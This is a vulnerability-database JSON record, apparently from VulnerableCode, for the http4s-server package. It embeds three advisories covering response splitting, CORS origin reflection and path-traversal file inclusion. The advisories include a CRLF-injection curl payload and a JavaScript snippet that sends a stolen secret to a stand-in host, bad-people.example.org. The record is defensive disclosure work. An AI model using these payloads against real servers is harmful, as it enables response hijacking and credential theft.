{"url":"http://public2.vulnerablecode.io/api/packages/443800?format=json","purl":"pkg:maven/org.http4s/http4s-server_2.12@0.15.4a","type":"maven","namespace":"org.http4s","name":"http4s-server_2.12","version":"0.15.4a","qualifiers":{},"subpath":"","is_vulnerable":true,"next_non_vulnerable_version":"0.21.29","latest_non_vulnerable_version":"0.23.4","affected_by_vulnerabilities":[{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/42184?format=json","vulnerability_id":"VCID-1p59-n3nc-d7fg","summary":"Response Splitting from unsanitized headers\n### Impact\n\nhttp4s is vulnerable to response-splitting or request-splitting attacks when untrusted user input is used to create any of the following fields:\n\n* Header names (`Header.name`å\n* Header values (`Header.value`)\n* Status reason phrases (`Status.reason`)\n* URI paths (`Uri.Path`)\n* URI authority registered names (`URI.RegName`) (through 0.21)\n\nThe following backends render invalid carriage return, newline, or null characters in an unsafe fashion.\n\n|                | blaze-server | ember-server | blaze-client | ember-client | jetty-client |\n|:---------------|:-------------|:-------------|:-------------|--------------|--------------|\n| header names   | ⚠            | ⚠            | ⚠            | ⚠            |   ⚠            | \n| header values  | ⚠            | ⚠            | ⚠            | ⚠            |              |\n| status reasons | ⚠            | ⚠            |              |              |              |\n| URI paths      |              |              |  ⚠             |  ⚠             |              |\n| URI regnames   |              |              |  ⚠ < 0.22           |  ⚠ < 0.22            |              |\n\nFor example, given the following service:\n\n```scala\nimport cats.effect._\nimport org.http4s._\nimport org.http4s.dsl.io._\nimport org.http4s.server.blaze.BlazeServerBuilder\nimport scala.concurrent.ExecutionContext.global\n\nobject ResponseSplit extends IOApp {\n  override def run(args: List[String]): IO[ExitCode] =\n    BlazeServerBuilder[IO](global)\n      .bindHttp(8080)\n      .withHttpApp(httpApp)\n      .resource\n      .use(_ => IO.never)\n\n  val httpApp: HttpApp[IO] =\n    HttpApp[IO] { req =>\n      req.params.get(\"author\") match {\n        case Some(author) =>\n          Ok(\"The real content\")\n            .map(_.putHeaders(Header(\"Set-Cookie\", s\"author=${author}\")))\n        case None =>\n          BadRequest(\"No author parameter\")\n      }\n    }\n}\n```\n\nA clean `author` parameter returns a clean response:\n\n```sh\ncurl -i 'http://localhost:8080/?author=Ross'\n```\n\n```http\nHTTP/1.1 200 OK\nContent-Type: text/plain; charset=UTF-8\nSet-Cookie: author=Ross\nDate: Mon, 20 Sep 2021 04:12:10 GMT\nContent-Length: 16\n\nThe real content\n```\n\nA malicious `author` parameter allows a user-agent to hijack the response from our server and return different content:\n\n```sh\ncurl -i 'http://localhost:8080/?author=hax0r%0d%0aContent-Length:+13%0d%0a%0aI+hacked+you'\n```\n\n```http\nHTTP/1.1 200 OK\nContent-Type: text/plain; charset=UTF-8\nSet-Cookie: author=hax0r\nContent-Length: 13\n\nI hacked you\n```\n\n### Patches\n\nVersions 0.21.29, 0.22.5, 0.23.4, and 1.0.0-M27 perform the following:\n\n* If a status reasoon phrase is invalid, it is dropped. Rendering is optional per spec.\n* If a header name is invalid in a request or response, the header is dropped.  There is no way to generically sanitize a header without potentially shadowing a correct one.\n* If a header value is invalid in a request or response, it is sanitized by replacing null (`\\u0000`), carriage return (`\\r`), and newline (`\\n`) with space (` `) characters per spec.\n* If a URI path or registered name is invalid in a request line, the client raises an `IllegalArgumentException`.\n* If a URI registered name is invalid in a host header, the client raises an `IllegalArgumentException`. \n\n### Workarounds\n\nhttp4s services and client applications should sanitize any user input in the aforementioned fields before returning a request or response to the backend.  The carriage return, newline, and null characters are the most threatening.\n\nNot all backends were affected: jetty-server, tomcat-server, armeria, and netty on the server; async-http-client, okhttp-client, armeria, and netty as clients.\n\n### References\n* https://owasp.org/www-community/attacks/HTTP_Response_Splitting\n* https://httpwg.org/http-core/draft-ietf-httpbis-semantics-latest.html#fields.values\n\n### For more information\nIf you have any questions or comments about this advisory:\n* Open an issue in [GitHub](http://github.com/http4s/http4s)\n* Contact us via the [http4s security policy](https://github.com/http4s/http4s/security/policy)","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2021-41084","reference_id":"","reference_type":"","scores":[{"value":"0.00451","scoring_system":"epss","scoring_elements":"0.63985","published_at":"2026-05-29T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2021-41084"},{"reference_url":"https://github.com/http4s/http4s","reference_id":"","reference_type":"","scores":[{"value":"8.7","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/http4s/http4s"},{"reference_url":"https://github.com/http4s/http4s/commit/d02007db1da4f8f3df2dbf11f1db9ac7afc3f9d8","reference_id":"","reference_type":"","scores":[{"value":"8.7","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/http4s/http4s/commit/d02007db1da4f8f3df2dbf11f1db9ac7afc3f9d8"},{"reference_url":"https://github.com/http4s/http4s/security/advisories/GHSA-5vcm-3xc3-w7x3","reference_id":"","reference_type":"","scores":[{"value":"8.7","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/http4s/http4s/security/advisories/GHSA-5vcm-3xc3-w7x3"},{"reference_url":"https://httpwg.org/http-core/draft-ietf-httpbis-semantics-latest.html#fields.values","reference_id":"","reference_type":"","scores":[{"value":"8.7","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://httpwg.org/http-core/draft-ietf-httpbis-semantics-latest.html#fields.values"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2021-41084","reference_id":"","reference_type":"","scores":[{"value":"8.7","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2021-41084"},{"reference_url":"https://owasp.org/www-community/attacks/HTTP_Response_Splitting","reference_id":"","reference_type":"","scores":[{"value":"8.7","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://owasp.org/www-community/attacks/HTTP_Response_Splitting"},{"reference_url":"https://github.com/advisories/GHSA-5vcm-3xc3-w7x3","reference_id":"GHSA-5vcm-3xc3-w7x3","reference_type":"","scores":[],"url":"https://github.com/advisories/GHSA-5vcm-3xc3-w7x3"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/76257?format=json","purl":"pkg:maven/org.http4s/http4s-server_2.12@0.21.29","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:maven/org.http4s/http4s-server_2.12@0.21.29"},{"url":"http://public2.vulnerablecode.io/api/packages/76258?format=json","purl":"pkg:maven/org.http4s/http4s-server_2.12@0.22.5","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:maven/org.http4s/http4s-server_2.12@0.22.5"},{"url":"http://public2.vulnerablecode.io/api/packages/76259?format=json","purl":"pkg:maven/org.http4s/http4s-server_2.12@0.23.4","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:maven/org.http4s/http4s-server_2.12@0.23.4"}],"aliases":["CVE-2021-41084","GHSA-5vcm-3xc3-w7x3"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-1p59-n3nc-d7fg"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/42224?format=json","vulnerability_id":"VCID-8w5c-xgr6-fbh6","summary":"Default CORS config allows any origin with credentials\n### Impact\n\n#### Origin reflection attack\n\nThe default CORS configuration is vulnerable to an origin reflection attack.  Take the following http4s app `app`, using the default CORS config, running at https://vulnerable.example.com:\n\n```scala\nval routes: HttpRoutes[F] = HttpRoutes.of {\n  case req if req.pathInfo === \"/secret\" =>\n    Response(Ok).withEntity(password).pure[F]\n}\nval app = CORS(routes.orNotFound)\n```\n\nThe following request is made to our server:\n\n```http\nGET /secret HTTP/1.1\nHost: vulnerable.example.com\nOrigin: https://adversary.example.net\nCookie: sessionId=...\n```\n\nWhen the `anyOrigin` flag of `CORSConfig` is `true`, as is the case in the default argument to `CORS`, the middleware will allow sharing its resource regardless of the `allowedOrigins` setting.  Paired with the default `allowCredentials`, the server approves sharing responses that may have required credentials for sensitive information with any origin:\n\n```http\nHTTP/1.1 200 OK\nAccess-Control-Allow-Origin: https://adversary.example.org\nAccess-Control-Allow-Credentials: true \nContent-Type: text/plain\n\np4ssw0rd\n```\n\nA malicious script running on `https://adversary.example.org/` can then exfiltrate sensitive information with the user's credentials to `vulnerable.exmaple.org`:\n\n```javascript\nvar req = new XMLHttpRequest(); \nreq.onload = reqListener; \nreq.open('get','https://vulnerable.example.org/secret',true); \nreq.withCredentials = true;\nreq.send();\n\nfunction reqListener() {\n    location='//bad-people.example.org/log?key='+this.responseText; \n};\n```\n\n#### Null origin attack\n\nThe middleware is also susceptible to a Null Origin Attack.  A user agent may send `Origin: null` when a request is made from a sandboxed iframe.  The CORS-wrapped http4s app will respond with `Access-Control-Allow-Origin: null`, permitting a similar exfiltration of secrets to the above.\n\n### Patches\n\nThe problem is fixed in 0.21.27, 0.22.3, 0.23.2, and 1.0.0-M25.  The original `CORS` implementation and `CORSConfig` are deprecated.  In addition to the origin vulnerability, the following deficiencies in the deprecated version are fixed in the new signatures:\n\n### Migration\n\nThe `CORS` object exposes a default `CORSPolicy` via `CORS.policy`.  This can be configured with various `with*` methods, like any http4s builder.  Finally, the `CORSPolicy` may be applied to any `Http`, like any other http4s middleware:\n\n```scala\nval routes: HttpRoutes[F] = ???\nval cors = CORS.policy\n  .withAllowOriginAll\n  .withAllowCredentials(false)\n  .apply(routes)\n```\n\n### Workarounds\n\nIt is possible to be safe in unpatched versions, but note the following defects exist:\n\n* The `anyMethod` flag, enabled by default, accepts methods that cannot be enumerated in the `Access-Control-Allow-Methods` preflight response.\n* Rejected CORS requests receive a `403` response, when the client should be the enforcement point. The server should just omit all CORS response headers.\n* Does not send `Vary: Access-Control-Request-Headers` on preflight requests. This may confuse caches.\n* Does not validate the `Access-Control-Request-Headers` of a preflight request. This validation is not mandated by the Fetch standard, but is typical of most server implementations.\n* Needlessly sends `Vary: Access-Control-Request-Method` on non-preflight requests.  This should be harmless in practice.\n* Needlessly sends `Access-Control-Max-Age` header on non-preflight requests.  This should be harmless in practice.\n* Sends an invalid `Access-Control-Allow-Credentials: false` instead of omitting the header.  This should be harmless in practice.\n\n#### Explicit origins\n\nIn versions before the patch, set `anyOrigin` to `false`, and then specifically include trusted origins in `allowedOrigins`.\n\n##### 0.21.x\n\n```scala\nval routes: HttpRoutes[F] = ???\nval config = CORS.DefaultConfig.copy(\n  anyOrigin = false,\n  allowOrigins = Set(\"http://trusted.example.com\")\n)\nval cors = CORS(routes, config)\n```\n\n###### 0.22.x, 0.23.x, 1.x\n\n```scala\nval routes: HttpRoutes[F] = ???\nval config = CORSConfig.default\n  .withAnyOrigin(false)\n  .withAllowedOrigins(Set(\"http://trusted.example.com\"))\nval cors = CORS(routes, config)\n```\n\n#### Disable credentials\n\nAlternatively, sharing responses tainted by credentials can be deprecated.\n\n##### 0.21.x\n\n```scala\nval routes: HttpRoutes[F] = ???\nval config = CORS.DefaultConfig.copy(allowCredentials = false)\nval cors = CORS(routes, config)\n```\n\n##### 0.22.x, 0.23.x, 1.x\n\n```scala\nval routes: HttpRoutes[F] = ???\nval config = CORSConfig.default.withAllowedCredentials(false)\nval cors = CORS(routes, config)\n```\n\n### References\n* The [MDN guide to CORS](https://developer.mozilla.org/en-US/docs/Web/HTTP/CORS)\n* [PayloadsAllTheThings CORS misconfiguration](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/6cba7ceda93c3f64559c3e73881c21076536e5fb/CORS%20Misconfiguration/README.md)\n\n### For more information\nIf you have any questions or comments about this advisory:\n* Open an issue in [GitHub](http://github.com/http4s/http4s)\n* Contact us via the [http4s security policy](https://github.com/http4s/http4s/security/policy)","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2021-39185","reference_id":"","reference_type":"","scores":[{"value":"0.00169","scoring_system":"epss","scoring_elements":"0.37842","published_at":"2026-05-29T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2021-39185"},{"reference_url":"https://github.com/http4s/http4s","reference_id":"","reference_type":"","scores":[{"value":"9.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/http4s/http4s"},{"reference_url":"https://github.com/http4s/http4s/releases/tag/v0.23.2","reference_id":"","reference_type":"","scores":[{"value":"9.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/http4s/http4s/releases/tag/v0.23.2"},{"reference_url":"https://github.com/http4s/http4s/security/advisories/GHSA-52cf-226f-rhr6","reference_id":"","reference_type":"","scores":[{"value":"9.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/http4s/http4s/security/advisories/GHSA-52cf-226f-rhr6"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2021-39185","reference_id":"","reference_type":"","scores":[{"value":"9.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2021-39185"},{"reference_url":"https://github.com/advisories/GHSA-52cf-226f-rhr6","reference_id":"GHSA-52cf-226f-rhr6","reference_type":"","scores":[],"url":"https://github.com/advisories/GHSA-52cf-226f-rhr6"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/76303?format=json","purl":"pkg:maven/org.http4s/http4s-server_2.12@0.21.27","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1p59-n3nc-d7fg"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:maven/org.http4s/http4s-server_2.12@0.21.27"},{"url":"http://public2.vulnerablecode.io/api/packages/76305?format=json","purl":"pkg:maven/org.http4s/http4s-server_2.12@0.22.3","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1p59-n3nc-d7fg"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:maven/org.http4s/http4s-server_2.12@0.22.3"},{"url":"http://public2.vulnerablecode.io/api/packages/76306?format=json","purl":"pkg:maven/org.http4s/http4s-server_2.12@0.23.2","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1p59-n3nc-d7fg"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:maven/org.http4s/http4s-server_2.12@0.23.2"}],"aliases":["CVE-2021-39185","GHSA-52cf-226f-rhr6"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-8w5c-xgr6-fbh6"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/40995?format=json","vulnerability_id":"VCID-gvst-fbdw-tyhq","summary":"Local file inclusion vulnerability in http4s\n### Impact\n\nThis vulnerability applies to all users of:\n* `org.http4s.server.staticcontent.FileService`\n* `org.http4s.server.staticcontent.ResourceService`\n* `org.http4s.server.staticcontent.WebjarService`\n\n#### Path escaping\n\nURI normalization is applied incorrectly.  Requests whose path info contain `../` or `//` can expose resources outside of the configured location.  Specifically:\n\n* `FileService` may expose any file on the local file system.\n* `ResourceService` may expose any resource on the class path.\n\n#### Prefix matching\n\nWhen the service is configured with a non-empty `pathPrefix` that doesn't end in a slash, any directories whose names are a prefix of `systemPath` (from `FileService`) or `pathPrefix` (from `ResourceService`) are exposed.  For example, if `pathPrefix` is `/foo` and `systemPath` is `/bar`, a request to `/foobaz/quux.txt` exposes file `/barbaz/quux.txt`, when only files beneath `/bar` should be available.\n\n#### URI decoding\n\nURI segments are not decoded before resource resolution.  This causes resources with reserved characters in their name to incorrectly return a 404.  It also may incorrectly expose the rare resource whose name is URI encoded.  This applies to `FileService`, `ResourceService`, and `WebjarService`.\n\n### Patches\n\nIn all three services, paths with an empty segment, a `.` segment, or a `..` segment are now rejected with a `400 Bad Request` response.  This fixes exposure outside the configured root.  Many clients already eliminate dot segments according to the rules in [RFC3986, Section 5.2.4](https://tools.ietf.org/html/rfc3986#section-5.2.4).  A middleware that does so at the server level may be considered if there is demand.\n\nIf `pathInfo` is non-empty, and does not begin with `/`, then a 404 response is generated.  This fixes the prefix matching exposure.\n\nAll path segments are URI decoded before being passed to the file system or resource path.  This allows resolution of resources with reserved characters in the name, and prevents incorrect exposure of resources whose names are themselves URI encoded.\n\n### Workarounds\n\nThe recommended course is to upgrade:\n* v0.18.26, binary compatible with the 0.18.x series\n* v0.20.20, binary compatible with the 0.20.x series\n* v0.21.2, binary compatible with the 0.21.x series\n\nNote that 0.19.0 is a deprecated release and has never been supported.\n\nIf an upgrade is impossible:\n\n* Temporarily copy `FileService.scala`, `ResourceService.scala`, and `WebjarService.scala` from the appropriate release series into your project and recompile with that, changing the package name and reference in your application.\n* Users of a servlet backend can use the servlet container's file serving capabilities.\n\n### Credits\n\nThank you to Thomas Gøytil for the discovery, responsible disclosure, and assistance testing of this vulnerability.\n\n### For more information\nIf you have any questions or comments about this advisory:\n* Open an issue in [http4s/http4s](http://github.com/http4s/http4s)\n* Email a maintainer:\n  * [Ross A. Baker](mailto:ross@rossabaker.com)","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2020-5280","reference_id":"","reference_type":"","scores":[{"value":"0.00848","scoring_system":"epss","scoring_elements":"0.75158","published_at":"2026-05-29T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2020-5280"},{"reference_url":"https://github.com/http4s/http4s/commit/250afddbb2e65b70ca9ddaec9d1eb3aaa56de7ec","reference_id":"","reference_type":"","scores":[{"value":"7.6","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:L/A:N"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/http4s/http4s/commit/250afddbb2e65b70ca9ddaec9d1eb3aaa56de7ec"},{"reference_url":"https://github.com/http4s/http4s/commit/752b3f63a05a31d2de4f8706877aa08d6b89efca","reference_id":"","reference_type":"","scores":[{"value":"7.6","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:L/A:N"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/http4s/http4s/commit/752b3f63a05a31d2de4f8706877aa08d6b89efca"},{"reference_url":"https://github.com/http4s/http4s/commit/b87f31b2292dabe667bec3b04ce66176c8a3e17b","reference_id":"","reference_type":"","scores":[{"value":"7.6","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:L/A:N"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/http4s/http4s/commit/b87f31b2292dabe667bec3b04ce66176c8a3e17b"},{"reference_url":"https://github.com/http4s/http4s/security/advisories/GHSA-66q9-f7ff-mmx6","reference_id":"","reference_type":"","scores":[{"value":"7.6","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:L/A:N"},{"value":"CRITICAL","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/http4s/http4s/security/advisories/GHSA-66q9-f7ff-mmx6"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2020-5280","reference_id":"","reference_type":"","scores":[{"value":"7.6","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:L/A:N"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2020-5280"},{"reference_url":"https://github.com/advisories/GHSA-66q9-f7ff-mmx6","reference_id":"GHSA-66q9-f7ff-mmx6","reference_type":"","scores":[{"value":"CRITICAL","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-66q9-f7ff-mmx6"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/74560?format=json","purl":"pkg:maven/org.http4s/http4s-server_2.12@0.18.26","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1p59-n3nc-d7fg"},{"vulnerability":"VCID-8w5c-xgr6-fbh6"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:maven/org.http4s/http4s-server_2.12@0.18.26"},{"url":"http://public2.vulnerablecode.io/api/packages/74561?format=json","purl":"pkg:maven/org.http4s/http4s-server_2.12@0.20.20","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1p59-n3nc-d7fg"},{"vulnerability":"VCID-8w5c-xgr6-fbh6"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:maven/org.http4s/http4s-server_2.12@0.20.20"},{"url":"http://public2.vulnerablecode.io/api/packages/74562?format=json","purl":"pkg:maven/org.http4s/http4s-server_2.12@0.21.2","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1p59-n3nc-d7fg"},{"vulnerability":"VCID-8w5c-xgr6-fbh6"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:maven/org.http4s/http4s-server_2.12@0.21.2"}],"aliases":["CVE-2020-5280","GHSA-66q9-f7ff-mmx6"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-gvst-fbdw-tyhq"}],"fixing_vulnerabilities":[],"risk_score":null,"resource_url":"http://public2.vulnerablecode.io/packages/pkg:maven/org.http4s/http4s-server_2.12@0.15.4a"}